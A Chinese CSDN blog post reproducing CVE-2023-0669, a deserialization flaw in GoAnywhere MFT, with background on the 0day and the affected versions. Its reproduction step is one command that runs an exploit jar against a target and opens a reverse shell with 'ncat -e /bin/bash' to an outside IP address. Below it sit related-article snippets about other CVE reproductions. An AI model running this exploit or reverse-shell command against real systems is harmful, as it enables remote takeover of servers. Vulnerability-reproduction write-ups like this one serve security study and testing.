GoAnywhereMFT反序列化漏洞复现(CVE-2023-0669 )

已于 2023-03-17 14:41:17 修改
阅读量987 收藏
点赞数
文章标签: java 开发语言
于 2023-02-28 16:38:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32445755/article/details/129262870
版权

简介

GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。

2月1日,Fortra(此前名称为HelpSystems)通知GoAnywhere MFT用户注意一个“远程代码注入利用0day”。之后该公司还发布了两份其它安全通知,每份通知都提供了缓解措施和妥协指标 (IoCs)。

该漏洞是一个远程代码注入漏洞,攻击者需要访问该应用的管理员控制台才能利用它。安全研究员Kevin Beaumont 指出,目前互联网上可公开访问1000多个本地实例,其中多数位于美国。

影响版本

GoAnywhereMFT小于7.1.2版本 

复现 

打开burp,与burp联动使用,不打开会报错 

java -jar CVE-2023-0669.jar -p http://127.0.0.1:8080 -t 目标 -c "ncat -e /bin/bash 114.116.65.127 11112"

qq_1136014935
关注
漏洞复现 CVE-2023-0669 GoAnywhereMFT存在反序列化漏洞
nnn2188185的博客
04-17 813
GoAnywhereMFT管理端存在反序列化漏洞,攻击者利用该漏洞无需登录便可以远程执行任意命令。漏洞被追踪为CVE-2023-0669
用 Goby 通过反序列化漏洞一键打入内存马【利用篇】_命令执行注入内存马
2401_84931491的博客
05-13 632
在全部配置完成后,点击生成,就可以将生成的反序列化 payload 进行保存了。关于 Gadget、利用方式等相关信息的更多介绍,可以查看我开源项目的 ReadMe 或源代码。
多家大企业受GoAnywhere 0day 漏洞攻击影响
smellycat000的专栏
03-28 675
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士越来越多的企业开始证实遭 Fortra 公司 GoAnywhere 文件转移管理 (MFT) 软件0day 漏洞 (CVE-2023-0669) 的攻击。该漏洞在今年2月初被公开披露,一周后该漏洞的利用和补丁也发布。不久,俄罗斯威胁组织 Silence 被指利用该漏洞分发 Cl0p 勒索软件。上周,该勒索团伙在其基于 Tor 的泄漏网站上公布了受...
漏洞复现-Citrix 信息泄露漏洞分析(CVE-2023-4966)
最新发布
玄道的网安博客
08-12 1365
snprintf函数被用于将hostname参数拼接到print_temp_rule变量中,并根据返回的长度,通过ns_vpn_send_response函数返回HTTP请求的结果。这里的hostname参数是由 HTTP 请求中的 Host 头决定的,因此这个参数的长度我们是完全可以控制的。snprintf 这个函数应该返回的是 ”想要写入buffer 的字符串长度“ , 而不是实际写入buffer的字符长长度。可以看到,当我想写入 16长度的字符串的时候, n2的值为 16, 而不是实际写入的长度。
Goby漏洞更新|GoAnywhere MFT 反序列化漏洞CVE-2023-0669
m0_46699477的博客
04-13 331
GoAnywhere MFT 反序列化漏洞CVE-2023-0669
CVE-2023-0669 GoAnywhereMFT反序列化漏洞复现
qq_31149401的博客
02-23 366
GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则产生的一切后果自行承担,与本文作者无关!本文来源于Lonely Blog , 转载请注明出处: https://blog.wuhao13.xin/4169.html。
Go语言反序列化
深漂小码哥
01-29 433
package main import ( "encoding/json" "fmt" ) type Student struct { Name string Age int Hobby string } // 反序列化 func unmarshalStruct() { str := "{\"age\":22,\"hobby\":\"reading\",\"name\":\"lisi\"}" var student Student err := json.Unmarshal([]by.
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
golang中json反序列化可能遇到的问题
12-26
前言 在golang中,当浮点数超过一定数值的时候,golang会把它弄成科学计数法的形式进行显示(好像只要大于七位数就变成科学计数法了) var val float64 val = 1000000 fmt.Println(val) // ==> 1e+06 而在日常开发中,我们经常遇到这样一个问题,就是要反序列化前端传递来的json,因为数据结构未知,所以我们便会使用map[string]interface{}来接收反序列化的结果。由于golang将json解析到interface{}类型的时候,遵循如下规则 bool 代表 JSON booleans, float64 代表 JS
网安漏洞复现系列:漏洞复现之JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
weixin_54626591的博客
05-06 225
漏洞复现之JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
浅谈Golang中Json反序列化的一些 “坑” !
Larouzey的博客
09-18 4730
菜鸟程序猿学习Go语言时遇到的一些坑 ???????????? 1、反序列化结构体 的“字段/属性”要求要与 序列化时结构体 的“字段/属性”必须保持一致。 简单的来说就是序列化定义的结构体,在反序列化的时候,结构体 标识符 可以不一样(可以理解为结构体的名字),但是结构体的内部 字段/属性 要一致 举个例子: 结构体序列化之前 type Hero struct { Name string `json:"hero...
一款集合各种exp的实用性工具
Javachichi的博客
05-05 646
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。本工具仅提供安全测试人员使用于授权测试, 禁止使用于未授权测试, 违者责任自负。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。视频配套资料&国内外网安书籍、文档&工具。
CVE-2023-22809复现(Rot5pider安全团队)
weixin_52763014的博客
04-08 2905
复现过程中,遇到了编辑器的版本问题,vim 8.0 没办法使用那条攻击命令报错是说vim不能使用--参数,但是换了一个环境的ubuntu下的vim8.1就可以执行,具体问题不是很清楚,可以多试试。具体格式就是: xxx ALL=(ALL:ALL) sudoedit /etc/xxx 其中第一个xxx是你要进行提权的普通用户的用户名,第二是etc下的一个随意文件(这里具体哪些能行哪些不能行,我也不知道,我测试的vim和xml都可以执行,多试试)保存退出,然后 su xxx切换到用户中。
pyLoad远程代码执行漏洞复现(CVE-2023-0297)
0xSec
01-30 2922
pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。
pyLoad远程代码执行漏洞(CVE-2023-0297)复现以及原理流量特征分析
xhscxj的博客
02-10 2714
pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 1702
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
Weblogic IIOP反序列化漏洞(CVE-2020-2551)
07-28
嗨!关于Weblogic IIOP反序列化漏洞CVE-2020-2551),以下是一些相关信息: CVE-2020-2551是Weblogic Server的一个严重漏洞,该漏洞允许攻击者通过发送特制的T3协议请求来执行任意代码。这个漏洞属于Java反序列化漏洞的一种。 该漏洞的影响版本包括Weblogic Server 10.3.6.0.0、12.1.3.0.0和12.2.1.3.0。攻击者可以利用该漏洞远程执行任意代码,可能导致服务器的完全控制。 Oracle已经发布了安全补丁来修复这个漏洞。建议受影响的用户尽快升级到修复版本,并确保及时应用所有安全补丁。 此外,还可以通过配置防火墙规则、限制网络访问和监控异常行为等方法来增强系统的安全性。 希望这些信息能对你有所帮助!如果还有其他问题,请继续提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qq_1136014935

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值